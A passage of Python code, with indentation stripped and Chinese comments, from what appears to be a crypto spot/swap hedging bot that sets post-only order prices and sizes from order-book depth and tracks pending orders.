mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > (tolerate_limit / swap_present_price):
# 平仓时现货仓位多于合约仓位,spot卖太慢,现货卖在对手价,0607spot卖在中间价
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*tolerate_limit / 2 / swap_present_price < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*(tolerate_limit / 4 / swap_present_price):
# 平仓时合约仓位多于现货仓位,合约要加速平空,合约买在best价,现货调整卖在2档
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][2][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*tolerate_limit / swap_present_price < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*(tolerate_limit / 2 / swap_present_price):
# 平仓时合约仓位多于现货仓位,合约要加速平空,合约买在中间价,现货卖在五档
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*tolerate_limit / swap_present_price:
# 平仓时合约仓位多于现货仓位,合约要加速平空,合约买在对手价 0607 swap买在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': '0',
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
else: # 平时设置在best,spot平多卖出,swap平空买入
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
if open_long_final_open_mode == 'on': # swap继续开仓开空,swap_position<0,spot_balance>0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount,swap是open_long_final_open_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size=int(Necessary_info[h]['swap_min_size'])
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size']< float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_long_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, #买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if open_short_final_open_mode == 'on': # swap继续开仓开多,swap_position>0,spot_balance<0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount,swap是open_short_final_open_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) >= Necessary_info[h]['swap_min_size'] * Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size = int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著开多在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_short_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, #买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if open_long_final_close_mode == 'on': # swap仓位多于spot,要平空,swap_position<0,spot_balance>0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount,swap是open_long_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) >= Necessary_info[h]['swap_min_size'] * \
Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h][
'contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size = int(abs(
Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著平空/买在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_long_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, # 买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if open_short_final_close_mode == 'on': # swap仓位多于spot,要平多,swap_position>0,spot_balance<0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount,swap是open_short_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) >= Necessary_info[h]['swap_min_size'] * \
Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h][
'contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size = int(abs(
Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著平多/卖在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_short_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, # 买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if close_long_final_close_mode == 'on': # spot平多,swap继续平空a买在对手价,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_long_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著平空/买在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
if close_short_final_close_mode == 'on': # swap继续平多,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_short_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著平多/卖在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_close_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
if close_long_final_open_mode == 'on': # swap继续开空,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_final_open_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著开空/卖在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_close_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
if close_short_final_open_mode == 'on': # swap开多,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_final_open_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# 因为成交慢,试著开多/买在对手价, 0607改成挂在中间价
#如果swap best ask-best bid>1个tick_size,表示可以挂,不然就要挂best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_close_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
#print('funding_rate_result_1',funding_rate_result)
if open_long_mode == 'on':
# 下单,买spot,卖swap
spot_order_result, swap_order_result = take_long_order(mode_take_long_order)
time.sleep(0.1)
if spot_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_order_result != 'none':
if int(spot_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
#记录买进spot几单了
Operation_info[h]['spot_buy_trading_orders']=Operation_info[h]['spot_buy_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_order_result !='none':
if int(swap_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录卖出swap几单
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
# if h=='SWRV-USDT':
# print('open_long_spot_order_result',spot_order_result)
# print('open_long_swap_order_result',swap_order_result)
# print('spot_pending_list_left_open_long',Operation_info[h]['spot_pending_list_left'])
# print('swap_pending_list_left_open_long', Operation_info[h]['swap_pending_list_left'])
if open_short_mode == 'on':
# 下单,买swap,卖spot
spot_order_result, swap_order_result = take_short_order(mode_take_short_order)
time.sleep(0.1)
if spot_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_order_result != 'none':
if int(spot_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
#记录卖出spot几单了
Operation_info[h]['spot_sell_trading_orders']=Operation_info[h]['spot_sell_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_order_result !='none':
if int(swap_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录买进swap几单了
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
#print('open_short_spot_order_result', spot_order_result)
#print('open_short_swap_order_result', swap_order_result)
#print('spot_pending_list_left_open_long', Operation_info[h]['spot_pending_list_left'])
#print('swap_pending_list_left_open_long', Operation_info[h]['swap_pending_list_left'])
if close_long_mode == 'on':
#卖spot,买swap
spot_close_order_result, swap_close_order_result = take_close_long_order(mode_take_close_long_order)
time.sleep(0.1)
if spot_close_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_close_order_result != 'none':
if int(spot_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
#记录卖出spot几单
Operation_info[h]['spot_sell_trading_orders']=Operation_info[h]['spot_sell_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_close_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_close_order_result !='none':
if int(swap_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录买进swap几单
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
if close_short_mode == 'on':
#买spot,卖swap
spot_close_order_result, swap_close_order_result = take_close_short_order(mode_take_close_short_order)
time.sleep(0.1)
if spot_close_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_close_order_result != 'none':
if int(spot_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
#记录买进spot几单
Operation_info[h]['spot_buy_trading_orders']=Operation_info[h]['spot_buy_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_close_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_close_order_result !='none':
if int(swap_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录卖出swap几单
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
#print('spot_close_short_order_result_334', spot_close_order_result)
#print('swap_close_short_order_result_334', swap_close_order_result)
#print('spot_pending_list_left_open_long_334', Operation_info[h]['spot_pending_list_left'])
#print('swap_pending_list_left_open_long_334', Operation_info[h]['swap_pending_list_left'])
if open_long_final_open_mode == 'on':
#下單,卖swap
result = take_open_long_final_open_order(mode_take_open_long_final_open_order)
time.sleep(0.1)
#print('mode_take_open_long_final_open_order',mode_take_open_long_final_open_order)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录卖出swap几单
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if open_short_final_open_mode == 'on':
#下單,买swap
result = take_open_short_final_open_order(mode_take_open_short_final_open_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录买进swap几单
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if open_long_final_close_mode == 'on':
# 下单,买swap
result = take_open_long_final_close_order(mode_take_open_long_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录买进swap几单
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if open_short_final_close_mode == 'on':
# 下单,卖出swap
result = take_open_short_final_close_order(mode_take_open_short_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录卖出swap几单
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_long_final_close_mode == 'on':
# 下单
result = take_close_long_final_close_order(mode_take_close_long_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录买进swap几单
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_short_final_close_mode == 'on':
# 下单,卖出swap
result = take_close_short_final_close_order(mode_take_close_short_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录卖出swap几单
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_long_final_open_mode == 'on':
# 下单
result = take_close_long_final_open_order(mode_take_close_long_final_open_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录卖出swap几单
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_short_final_open_mode == 'on':
# 下单
result = take_close_short_final_open_order(mode_take_close_short_final_open_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
#记录买进swap几单
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
# print('h12321',h)
# print('swap_pending_list_left_final',Operation_info[h]['swap_pending_list_left'])
# print('spot_pending_list_left_final',Operation_info[h]['spot_pending_list_left'])
# print('swap_depth5_12',Operation_info[h]['swap_depth5'])
# 更新新的swap五档
Operation_info[h]['swap_bids_price5'] = []
Operation_info[h]['swap_asks_price5'] = []
for i in range(5):
Operation_info[h]['swap_bids_price5'].append(float(Operation_info[h]['swap_depth5'][0]['bids'][i][0]))
Operation_info[h]['swap_asks_price5'].append(float(Operation_info[h]['swap_depth5'][0]['asks'][i][0]))
# 更新新的spot五档
Operation_info[h]['spot_bids_price5'] = []
Operation_info[h]['spot_asks_price5'] = []
for i in range(5):
Operation_info[h]['spot_bids_price5'].append(float(Operation_info[h]['spot_depth5'][0]['bids'][i][0]))
Operation_info[h]['spot_asks_price5'].append(float(Operation_info[h]['spot_depth5'][0]['asks'][i][0]))
Nowtime = datetime.now()
new_record_second = Nowtime.second
new_record_minute = Nowtime.minute
new_record_hour = Nowtime.hour
new_record_day = Nowtime.day
